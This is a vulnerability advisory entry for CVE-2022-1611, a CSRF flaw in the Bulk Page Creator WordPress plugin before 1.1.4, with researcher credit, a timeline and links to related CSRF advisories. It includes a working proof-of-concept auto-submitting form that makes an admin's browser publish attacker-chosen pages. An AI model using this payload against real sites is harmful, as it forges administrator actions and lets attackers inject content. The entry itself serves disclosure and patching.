Bulk Page Creator < 1.1.4 – Arbitrary Page Creation via CSRF | CVE 2022-1611 | Plugin Vulnerabilities

Description

The plugin does not protect its page creation functionalities with nonce checks, which makes them vulnerable to CSRF.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=sc_bpc_page" method="POST">
    <textarea name="sc-pages">0|-1|123|
1|-1|bbb|
2|-1|ccc|
3|-1|spam content|
</textarea>
    <input type="text" name="pcontent" value="2">
    <input type="text" name="posttype" value="publish">
    <input type="text" name="sc-pages-content" value="some post content">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

bulk-page-creator

Fixed in 1.1.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

3843b867-7784-4976-b5ab-8a1e7d45618a

Timeline

Publicly Published

2022-05-09 (about 2 years ago)

Added

2022-05-09 (about 2 years ago)

Last Updated

2022-05-10 (about 2 years ago)

Other

Published

Title

Published

2023-05-24

Title

WP Tiles <= 1.1.2 - Cross-Site Request Forgery

Published

2023-07-11

Title

Database Collation Fix < 1.2.8 - Cross-Site Request Forgery

Published

2023-05-21

Title

Smart App Banner < 1.1.3 - Cross-Site Request Forgery (CSRF)

Published

2023-02-27

Title

WP Google Tag Manager <= 1.1 - Cross-Site Request Forgery (CSRF)

Published

2024-03-25

Title

Simple Buttons Creator <= 1.04 - Aribtrary Button Deletion via CSRF